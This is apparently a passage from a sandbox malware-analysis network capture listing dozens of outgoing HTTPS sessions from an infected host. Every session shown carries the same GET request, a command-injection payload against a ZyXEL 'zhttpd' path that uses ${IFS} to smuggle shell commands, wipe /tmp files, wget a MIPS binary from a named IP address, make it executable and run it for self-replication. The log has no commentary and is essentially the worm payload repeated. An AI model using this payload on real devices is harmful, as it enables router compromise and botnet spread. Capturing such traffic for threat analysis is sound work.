                                                Jan 28, 2024 10:16:22.767337084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3741192.168.2.236034848.126.142.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767354965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3742192.168.2.2343538213.187.225.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767398119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3743192.168.2.2336248104.127.250.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767414093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3744192.168.2.236089473.215.76.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767422915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3745192.168.2.235767486.243.27.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767453909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3746192.168.2.2342292111.94.157.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767473936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3747192.168.2.2350350223.110.42.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767493010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3748192.168.2.2333120124.220.104.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767509937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3749192.168.2.234629293.195.150.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767560959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3750192.168.2.234418093.90.111.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767585039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3751192.168.2.2353278152.101.40.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767602921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3752192.168.2.235897289.99.104.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767637014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3753192.168.2.2349516137.224.73.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767664909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3754192.168.2.235102674.113.240.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767698050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3755192.168.2.234510063.177.215.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767734051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3756192.168.2.2336682124.27.117.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767760038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3757192.168.2.2339130216.254.201.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767771006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3758192.168.2.233457695.244.76.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767793894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3759192.168.2.234856872.179.100.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767796040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3760192.168.2.235515663.224.119.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767824888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3761192.168.2.2334150206.252.56.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767880917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3762192.168.2.233311035.0.210.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767894983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3763192.168.2.2341150151.2.159.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767929077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3764192.168.2.2340772118.62.98.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767930031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3765192.168.2.2348916107.143.229.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767956972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3766192.168.2.2338418140.119.31.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.767998934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3767192.168.2.2358152223.161.220.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768004894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3768192.168.2.23572664.70.215.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768037081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3769192.168.2.2348388115.224.245.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768079042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3770192.168.2.2338292212.122.215.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768110037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3771192.168.2.236025820.194.79.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768126965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3772192.168.2.234642898.251.146.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768146038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3773192.168.2.233660051.193.200.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768166065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3774192.168.2.235221849.66.155.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768214941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3775192.168.2.235461096.10.142.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768225908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3776192.168.2.233682683.167.228.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768276930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3777192.168.2.233877451.211.88.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768291950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3778192.168.2.23435548.84.163.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768342018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3779192.168.2.2337430117.240.57.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768346071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3780192.168.2.234163237.103.246.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768389940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3781192.168.2.2355020212.152.205.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768429041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3782192.168.2.2351258138.233.186.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768434048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3783192.168.2.234058666.85.116.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768465042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3784192.168.2.235249069.60.41.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768485069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3785192.168.2.2340598109.21.47.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768507004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3786192.168.2.2333476149.91.139.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768511057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3787192.168.2.2350514190.126.90.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768573046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3788192.168.2.2360422222.171.0.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768582106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3789192.168.2.23603322.125.97.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768642902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3790192.168.2.235787447.189.88.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768651009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3791192.168.2.2340862135.165.133.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768673897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3792192.168.2.2352522180.9.126.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768706083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3793192.168.2.235021462.133.125.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768726110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3794192.168.2.2340588168.45.121.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768744946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3795192.168.2.233785254.246.170.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768778086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3796192.168.2.2355110220.66.239.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768800020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3797192.168.2.2356876125.76.182.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768822908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3798192.168.2.2344860102.203.230.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768853903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3799192.168.2.233708452.102.244.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768868923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3800192.168.2.2349946148.67.72.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768884897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3801192.168.2.2354090109.185.180.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.768887997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3802192.168.2.2337096122.250.82.20443
                                                TimestampBytes transferredDirectionData
